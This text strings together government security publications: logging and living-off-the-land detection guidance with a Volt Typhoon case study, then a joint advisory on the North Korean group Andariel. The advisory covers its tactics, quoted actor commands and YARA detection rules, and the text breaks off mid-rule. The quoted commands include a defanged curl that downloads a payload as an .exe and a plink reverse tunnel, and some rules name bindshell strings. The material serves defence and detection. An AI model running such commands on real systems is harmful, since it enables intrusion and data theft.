It is important to perform event log aggregation as some malicious actors are known to modify or delete local system event logs to avoid detection and to delay or degrade the efficacy of cyber security incident response. Logs may contain sensitive data that is useful to a malicious actor. As a result, users should only have access to the event logs they need to do their job.
An event logging facility should enable the protection of logs from unauthorized modification and deletion. Ensure that only personnel with a justified requirement have permission to delete or modify event logs and view the audit logs for access to the centralized logging environment. The storage of logs should be in a separate or segmented network with additional security controls to reduce the risk of logs being tampered with in the event of network or system compromise. Events logs should also be backed up and data redundancy practices should be implemented.
Organizations are encouraged to harden and segment their SIEM solutions from general IT environments. SIEMs are attractive targets for malicious actors because they contain a wealth of information, provide an analysis function, and can be a single point of failure in an organization’s detection capability. Organizations should consider filtering event logs before sending them to a SIEM or XDR to ensure it is receiving the most valuable logs to minimize any additional costs or capacity issues.
The aggregation of event logs to a central logging facility that a SIEM can draw from enables the identification of:
Timely ingestion of event logs is important in the early detection of a cyber security events and cyber security incidents. If the generation, collection and ingestion of event logs is delayed, the organization’s ability to identify cyber security incidents is also delayed.
ASD and co-authors recommend that organizations consider implementing user and entity behavioral analytics capabilities to enable automated detection of behavioral anomalies on networks, devices, or accounts. SIEMs can detect anomalous activity by comparing event logs to a baseline of business-as-usual traffic and activity. Behavioral analytics plays a key role in detecting malicious actors employing LOTL techniques. Below is a case study that shows how threat actors leveraged LOTL to infiltrate Windows-based systems.
Case study – Volt Typhoon Since mid-2021, Volt Typhoon has targeted critical infrastructure organizations by relying almost exclusively on LOTL techniques. Their campaign has been enabled by privately-owned SOHO routers, infected with the ‘KV Botnet’ malware. Volt Typhoon uses PowerShell, a command and scripting interpreter, to:
Volt Typhoon consistently obtains valid credentials by extracting the Active Directory database file NTDS.dit.[6]
Other LOTL techniques that Volt Typhoon has been observed to use includes:
While Volt Typhoon uses LOTL techniques to make detection more difficult, the behaviors that the malware exhibits would be considered abnormal compared to business-as-usual activity and could be used to create detection use cases. For more information, consider visiting MITRE ATT&CK®’s Volt Typhoon page and the MITRE ATT&CK framework. |
Examples of anomalous behavior can include:
Note that the above items could be legitimate behavior and not malicious activity. In these instances, further investigation by a network defender is required to determine if they are, in fact, evidence of a cyber security event.
To detect threats on endpoints such as user devices, organizations should consider implementing an endpoint detection and response solution. These solutions enable an organization to monitor malicious activity, such as malicious actors disabling security monitoring services, and process creation events with enhanced detail and fidelity.
By following the guidance in this publication to improve the collection and centralization of event logs, it will improve an organization’s ability to undertake effective threat hunting to proactively investigate LOTL compromises. Organizations should consider conducting threat hunting on their networks as a proactive measure to detect cyber security incidents. This is a particularly effective activity for detecting malicious actors employing LOTL techniques.
Organizations may also consider the following methods to increase the effectiveness of detecting potential LOTL techniques:
The joint-sealed publication Identifying and Mitigating Living Off the Land Techniques contains detailed detection guidance for cloud environments. One point states that if machine learning-powered detection capabilities are available within cloud provider security services, organizations should consider leveraging these capabilities and provide log data in real time from multiple sources to enhance log analysis. Using machine learning allows for the detection of anomalous behaviors that may indicate malicious activity. These include irregular API call patterns (especially those that involve changes to security groups, configuration of cloud resources or access to sensitive data), unusual cloud storage access and atypical network traffic.
Effective detection in an OT environment typically involves expertise from both IT and OT personnel; thus, an effective network security instrumentation involves collaborative efforts from both parties. This collaborative approach helps ensure that network defenders can quickly investigate relevant issues, and OT experts can raise operational concerns that may be tied to a cyber security incident. Furthermore, network defenders should leverage real-time alerts to determine any abnormal activity on an OT network. These alerts can include safety data, availability data, logins, failed logins[9], configuration changes, and network access and traffic. Organizations may need to consider whether alerts for OT environments should be approached differently. For example, OT devices may be in remote or hard-to-reach locations.
For detecting anomalous behavior in OT environments, look for:
Execution of scripts that are not part of regular operations.
Intrusion detection and intrusion prevention systems (IDS/IPS) are often designed with rules based on IT protocols; therefore, they may be more useful in OT operation systems or the OT demilitarized zone (DMZ) than in supervisory and process areas. Note, it is not recommended to deploy an IPS unless it is tailored to the OT environment, or is outside of critical process control. IPS risk interrupting critical OT devices.
For further guidance, consider visiting:
[1] While the audience for the cited guidance is U.S. Federal Civilian Executive Branch agencies, it may provide useful guidance to all entities regarding logging best practices.
[2] While only binding on U.S. Federal information systems, excluding national security systems, this memorandum may provide useful guidance to all entities regarding logging best practices.
[3] CISA’s “First 48”: What to Expect When a Cyber Incident Occurs
[4] The prioritized list focuses on logs that enable the detection of a malicious actor operating remotely. In this context, collecting logs from an air-gapped system is not a high priority unless malicious insiders are a concern.
[5] MDM and MAM events are likely to be server-sent events, but they may also be generated by software deployed to the mobile device.
[6] NTDS.dit contains usernames, hashed passwords, and group memberships for all domain accounts, allowing for full domain compromise if the hashes can be cracked offline.
[7] Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins).
[8] Large/continuous data exports should be alerted by default.
[9] Note that not all successful authentication events will be benign (e.g., credential theft or malicious insiders).
The material in this guide is of a general nature and should not be regarded as legal advice or relied on for assistance in any particular circumstance or emergency situation. In any important matter, you should seek appropriate independent professional advice in relation to your own circumstances.
CISA and the Commonwealth of Australia accept no responsibility or liability for any damage, loss or expense incurred as a result of the reliance on information contained in this guide.
© Commonwealth of Australia 2024.
All material presented in this publication is provided under a Creative Commons (CC) Attribution 4.0 International license.
For the avoidance of doubt, this means this license only applies to material as set out in this document.
The details of the relevant license conditions are available on the Creative Commons website as is the full legal code for the CC BY 4.0 license.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
]]>The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:
The RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.
The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.
The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.
The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations:
For additional information on DPRK state-sponsored malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.
Download the PDF version of this report:
For a downloadable copy of associated indicators of compromise (IOCs), see:
Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations.
The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.
Industry | Information Targeted |
---|---|
Defense |
|
Aerospace |
|
Nuclear |
|
Engineering |
|
The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs.
Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.
This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.
While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include:
The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement.
These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node.
Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. The use of publicly available malware enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success leveraging just open source malware. The authoring agencies have identified the following open-source tools as used and/or customized by the actors:
The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190].
The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat
commands, such as netstat –naop
and netstat –noa
[T1059]. Example commands used by the actors include the following:
netstat –naop
netstat –noa
pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>
curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:userspublicnotify[.]exe
C:windowssystem32cmd.exe /c systeminfo | findstr Logon
These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples.
The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0
and vmp1
for VMProtect and Themida or randomized file section names for Themida [T1027].
The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft tools such as Mimikatz, ProcDump, and Dumpert and accessing the Active Directory domain database through targeting of the NTDS.dit
file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin
command-line utility to back up a volume to retrieve a copy of the NTDS.dit
file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003].
The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083].
The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002].
The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp%
directory.
The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].
The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].
Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039].
The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048].
The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET
requests on port 80
to receive information [T1021].
See below for Andariel IOCs.
The following include observed MD5 hashes:
The following include observed SHA-256 hashes:
The following include a list of user agent strings used by the actors:
See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors.
rule Andariel_ScheduledTask_Loader { strings: $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 } $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 } $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 } condition: uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3 } |
rule Andariel_KaosRAT_Yamabot { strings: $str1 = "/kaos/" $str2 = "Abstand [" $str3 = "] anwenden" $str4 = "cmVjYXB0Y2hh" $str5 = "/bin/sh" $str6 = "utilities.CIpaddress" $str7 = "engine.NewEgg" $str8 = "%s%04x%s%s%s" $str9 = "Y2FwdGNoYV9zZXNzaW9u" $str10 = "utilities.EierKochen" $str11 = "kandidatKaufhaus" condition: 3 of them } |
rule TriFaux_EasyRAT_JUPITER { strings: $InitOnce = "InitOnceExecuteOnce" $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A } $Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide condition: uint16(0) == 0x5a4d and all of them } |
rule Andariel_CutieDrop_MagicRAT { strings: $config_os_w = "os/windows" ascii wide $config_os_l = "os/linux" ascii wide $config_os_m = "os/mac" ascii wide $config_comp_msft = "company/microsoft" ascii wide $config_comp_orcl = "company/oracle" ascii wide $POST_field_1 = "session=" ascii wide $POST_field_2 = "type=" ascii wide $POST_field_3 = "id=" ascii wide $command_misspelled = "renmae" ascii wide condition: uint16(0) == 0x5a4d and 7 of them |
rule Andariel_hhsd_FileTransferTool { strings: // 30 4D C7 xor [rbp+buffer_v41+3], cl // 81 7D C4 22 C0 78 00 cmp dword ptr [rbp+buffer_v41], 78C022h // 44 88 83 00 01 00 00 mov [rbx+100h], r8b $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 } // B1 14 mov cl, 14h // C7 45 F7 14 00 41 00 mov [rbp+57h+Src], 410014h // C7 45 FB 7A 00 7F 00 mov [rbp+57h+var_5C], 7F007Ah // C7 45 FF 7B 00 63 00 mov [rbp+57h+var_58], 63007Bh // C7 45 03 7A 00 34 00 mov [rbp+57h+var_54], 34007Ah // C7 45 07 51 00 66 00 mov [rbp+57h+var_50], 660051h // C7 45 0B 66 00 7B 00 mov [rbp+57h+var_4C], 7B0066h // C7 45 0F 66 00 00 00 mov [rbp+57h+var_48], 66h ; 'f' $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 } // 41 02 D0 add dl, r8b // 44 02 DA add r11b, dl // 3C 1F cmp al, 1Fh $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F } |
// B9 8D 10 B7 F8 mov ecx, 0F8B7108Dh // E8 F1 BA FF FF call sub_140001280 $hash_call_loadlib = { B? 8D 10 B7 F8 E8 } $hash_call_unk = { B? 91 B8 F6 88 E8 } condition: uint16(0) == 0x5a4d and (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or 2 of ($handshake, $err_xor_str, $buf_add_cmp_1f) |
rule Andariel_Atharvan_3RAT { strings: $3RAT = "D:\rang\TOOL\3RAT" $atharvan = "Atharvan_dll.pdb" condition: uint16(0) == 0x5a4d and any of them } |
rule Andariel_LilithRAT_Variant { strings: // The following are strings seen in the open source version of Lilith $lilith_1 = "Initiate a CMD session first." ascii wide $lilith_2 = "CMD is not open" ascii wide $lilith_3 = "Couldn't write command" ascii wide $lilith_4 = "Couldn't write to CMD: CMD not open" ascii wide // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith $unique_1 = "Upload Error!" ascii wide $unique_2 = "ERROR: Downloading is already running!" ascii wide $unique_3 = "ERROR: Unable to open file:" ascii wide $unique_4 = "General error" ascii wide $unique_5 = "CMD error" ascii wide $unique_6 = "killing self" ascii wide condition: uint16(0) == 0x5a4d and filesize < 150KB and all of ($lilith_*) and 2 of ($unique_*) } |
rule Andariel_SocksTroy_Strings_OpCodes { strings: $strHost = "-host" wide $strAuth = "-auth" wide $SocksTroy = "SocksTroy" $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B } condition: uint16(0) == 0x5a4d and ((1 of ($str*)) and (all of ($c*)) or (all of ($Socks*))) } |
rule Andariel_Agni { strings: $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 } $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24} condition: uint16(0) == 0x5a4d and (#xor > 100 and #stackstrings > 5) } |
rule Andariel_GoLang_validalpha_handshake { strings: $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 } condition: all of them } |
rule Andariel_GoLang_validalpha_tasks { strings: $ = "main.ScreenMonitThread" $ = "main.CmdShell" $ = "main.GetAllFoldersAndFiles" $ = "main.SelfDelete" condition: all of them } |
rule Andariel_GoLang_validalpha_BlackString { strings: $ = "I:/01___Tools/02__RAT/Black" condition: uint16(0) == 0x5A4D and all of them } |
rule INDICATOR_EXE_Packed_VMProtect { strings: $s1 = ".vmp0" fullword ascii $s2 = ".vmp1" fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == ".vmp0" or pe.sections[i].name == ".vmp1" ) ) } |
rule INDICATOR_EXE_Packed_Themida { strings: $s1 = ".themida" fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == ".themida" ) ) } |
rule Andariel_elf_backdoor_fipps { strings: $a = "found mac address" $b = "RecvThread" $c = "OpenSSL-1.0.0-fipps" $d = "Disconnected!" condition: (all of them) and uint32(0) == 0x464c457f } |
rule Andariel_bindshell { strings: $str_comspec = "COMSPEC" $str_consolewindow = "GetConsoleWindow" $str_ShowWindow = "ShowWindow" $str_WSASocketA = "WSASocketA" $str_CreateProcessA = "CreateProcessA" $str_port = {B9 4D 05 00 00 89} condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_grease2 { strings: $str_rdpconf = "c: \windows\temp\RDPConf.exe" fullword nocase $str_rdpwinst = "c: \windows\temp\RDPWInst.exe" fullword nocase $str_net_user = "net user" $str_admins_add = "net localgroup administrators" condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_NoPineapple_Dtrack_unpacked { strings: $str_nopineapple = "< No Pineapple! >" $str_qt_library = "Qt 5.12.10" $str_xor = {8B 10 83 F6 ?? 83 FA 01 77} condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_dtrack_unpacked { strings: $str_mutex = "MTX_Global" $str_cmd_1 = "/c net use \\" wide $str_cmd_2 = "/c ping -n 3 127.0.01 > NUL % echo EEE > "%s"" wide $str_cmd_3 = "/c move /y %s \\" wide $str_cmd_4 = "/c systeminfo > "%s" & tasklist > "%s" & netstat -naop tcp > "%s"" wide condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_TigerRAT_crowdsourced_rule { strings: $m1 = ".?AVModuleKeyLogger@@" fullword ascii $m2 = ".?AVModulePortForwarder@@" fullword ascii $m3 = ".?AVModuleScreenCapture@@" fullword ascii $m4 = ".?AVModuleShell@@" fullword ascii $s1 = "\x9891-009942-xnopcopie.dat" fullword wide $s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii $s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii $s4 = "del "%s"%s "%s" goto " ascii $s5 = "[<<]" fullword ascii condition: uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*))) } |
rule win_tiger_rat_auto { strings: $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 } // n = 5, score = 200 // 33c0 | jmp 5 // 89442438 | dec eax // 89442430 | mov eax, ecx // 448bcf | movzx eax, byte ptr [eax] // 4533c0 | dec eax $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? } // n = 4, score = 200 // 41b901000000 | dec eax // 488bd6 | mov eax, dword ptr [ecx] // 488bcb | jmp 8 // e8???????? | $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 } // n = 4, score = 200 // 4881ec90050000 | test eax, eax // 8b01 | jns 0x16 // 8985c8040000 | dec eax // 8b4104 | mov eax, dword ptr [ecx] $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 } // n = 4, score = 200 // 488b01 | mov edx, esi // ff10 | dec eax // 488b4f08 | mov ecx, ebx // 4c8d4c2430 | inc ecx $sequence_4 = { 488b01 ff10 488b4e18 488b01 } // n = 4, score = 200 // 488b01 | dec eax // ff10 | cmp dword ptr [ecx + 0x18], 0x10 // 488b4e18 | dec eax // 488b01 | sub esp, 0x590 $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 } // n = 4, score = 200 // 4881eca0000000 | mov eax, dword ptr [ecx] // 33c0 | mov dword ptr [ebp + 0x4c8], eax // 488bd9 | mov eax, dword ptr [ecx + 4] // 488d4c2432 | mov dword ptr [ebp + 0x4d0], eax $sequence_6 = { 488b01 eb03 488bc1 0fb600 } // n = 4, score = 200 // 488b01 | inc ecx // eb03 | mov ebx, dword ptr [ebp + ebp] // 488bc1 | inc ecx // 0fb600 | movups xmmword ptr [edi], xmm0 $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 } // n = 5, score = 200 // 488b01 | sub esp, 0x30 // 8b10 | dec ecx // 895124 | mov ebx, eax // 448b4124 | dec eax // 4585c0 | mov ecx, eax $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 } // n = 4, score = 100 // 4c8d0d31eb0000 | jne 0x1e6 // c1e918 | dec eax // c1e808 | lea ecx, [0xbda0] // 41bf00000080 | dec esp $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 } // n = 7, score = 100 // 488bd8 | dec eax // 4885c0 | mov ebx, eax // 752d | dec eax // ff15???????? | // 83f857 | test eax, eax // 0f85e0010000 | jne 0x2f // 488d0da0bd0000 | cmp eax, 0x57 $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b } // n = 5, score = 100 // 75d4 | lea ecx, [0xeb31] // 488d1d7f6c0100 | shr ecx, 0x18 // 488b4bf8 | shr eax, 8 // 4885c9 | inc ecx // 740b | mov edi, 0x80000000 $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff } // n = 7, score = 100 // 0f85d9000000 | jne 0xffffffd6 // 488d15d0c90000 | dec eax // 41b810200100 | lea ebx, [0x16c7f] // 488bcd | dec eax // e8???????? | // eb6b | mov ecx, dword ptr [ebx - 8] // b9f4ffffff | dec eax $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? } // n = 6, score = 100 // 48890d???????? | // 488905???????? | // 488d05ae610000 | test ecx, ecx // 488905???????? | // 488d05a0550000 | je 0x10 // 488905???????? | $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 } // n = 6, score = 100 // 8bcf | mov eax, 0x12010 // e8???????? | // 488b7c2448 | dec eax // 85c0 | mov ecx, ebp // 0f8440030000 | jmp 0x83 // 488d0560250100 | mov ecx, 0xfffffff4 $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? } // n = 7, score = 100 // ff15???????? | // 8b05???????? | // 2305???????? | // ba02000000 | dec eax // 33c9 | lea eax, [0x61ae] // 8905???????? | // 8b05???????? | $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 } // n = 5, score = 100 // 4883ec30 | jne 0xdf // 498bd8 | dec eax // e8???????? | // 488bc8 | lea edx, [0xc9d0] // 4885c0 | inc ecx condition: 7 of them and filesize < 557056 } |
rule win_dtrack_auto { strings: $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } // n = 7, score = 400 // 52 | push edx // 8b4508 | mov eax, dword ptr [ebp + 8] // 50 | push eax // e8???????? | // 83c414 | add esp, 0x14 // 8b4d10 | mov ecx, dword ptr [ebp + 0x10] // 51 | push ecx $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 } // n = 7, score = 300 // 3a4101 | cmp al, byte ptr [ecx + 1] // 7523 | jne 0x25 // 83854cf6ffff02 | add dword ptr [ebp - 0x9b4], 2 // 838550f6ffff02 | add dword ptr [ebp - 0x9b0], 2 // 80bd4af6ffff00 | cmp byte ptr [ebp - 0x9b6], 0 // 75ae | jne 0xffffffb0 // c78544f6ffff00000000 | mov dword ptr [ebp - 0x9bc], 0 $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 } // n = 7, score = 300 // 50 | push eax // ff15???????? | // a3???????? | // 68???????? | // e8???????? | // 83c404 | add esp, 4 // 50 | push eax $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? } // n = 5, score = 300 // 8d8dd4faffff | lea ecx, [ebp - 0x52c] // 51 | push ecx // e8???????? | // 83c408 | add esp, 8 // 8b15???????? | $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? } // n = 5, score = 300 // 8855f5 | mov byte ptr [ebp - 0xb], dl // 6a5c | push 0x5c // 8b450c | mov eax, dword ptr [ebp + 0xc] // 50 | push eax // e8???????? | $sequence_5 = { 51 e8???????? 83c410 8b558c 52 } // n = 5, score = 300 // 51 | push ecx // e8???????? | // 83c410 | add esp, 0x10 // 8b558c | mov edx, dword ptr [ebp - 0x74] // 52 | push edx $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? } // n = 